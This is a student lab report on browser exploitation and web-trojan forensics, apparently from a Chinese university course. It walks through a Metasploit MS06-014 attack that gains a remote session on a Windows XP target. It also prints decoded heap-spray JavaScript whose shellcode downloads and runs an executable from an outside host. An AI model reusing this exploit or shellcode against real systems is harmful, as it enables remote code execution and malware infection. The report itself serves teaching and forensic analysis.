20211907 2021-2022-2 《网络攻防实践》实践十一报告

一、 实践目标
(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析
实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。

0③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

二、 实践过程

  1. web浏览器渗透攻击

靶机winxp:192.168.1.102
攻击机kali:192.168.1.104
在kali中打开msfconsole,搜索MS06-014漏洞。
之后设置攻击机地址:set LHOST 192.168.1.104
得到一个含有有木马的网址:http://192.168.1.101:8080/C9RRetHOA.
之后我们在靶机中登录这个地址,再回到攻击机中发现已经建立会话,攻击完成。


  1. 取证分析实践—网页木马攻击场景分析
    发现start.html怎么也打不开,去网上查攻略
    给出的结构流程如下:

在网上查询http://aa.18dd.net/aa/kl.htm对应的32位加密md5值是:7f60672dcd6b5e90b6772545ee219bd3
之后在hashed文件夹中用记事本的方式打开7f60672dcd6b5e90b6772545ee219bd3文件,找到它的源代码,可以看到它的密钥是“\x73\x63\x72\x69\x70\x74”,解密后得到密钥为script

之后再打开1.js文件,查看代码,将代码进行16进制解密

在解密,结果:
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "
";
storm.rawParse(buffer)

发现2f后面跟的代码:%u2f62%u6662%u652e%u6578%u0000
解密后是http://down.18dd.net/bb/bf.exe
同理,对于pps.js,解密后是shellcode
再检查检查bf.exe情况,看他是否加壳了:

发现没加
再用杀毒软件去扫一下:

  1. 攻防对抗实践——web浏览器渗透攻击攻防对抗
    在实验一中访问那个恶意HTML。同时查看源代码

发现它为了防止被杀毒软件删掉,对关键指令做了字符串拼接处理,同时使用了大量空格来扰乱视线。
把无效的内容处理后,可得到完整的代码:

kHNbbdThGhM

学习中遇到的问题及解决
实验一中总是渗透不成功
解决方法:重启了无数次,结果就好了,不明所以。。
心得感悟
这周任务看着不多,实操起来还挺麻烦的。

posted @ 2022-05-25 22:49  lch99722  阅读(130)  评论(0编辑  收藏  举报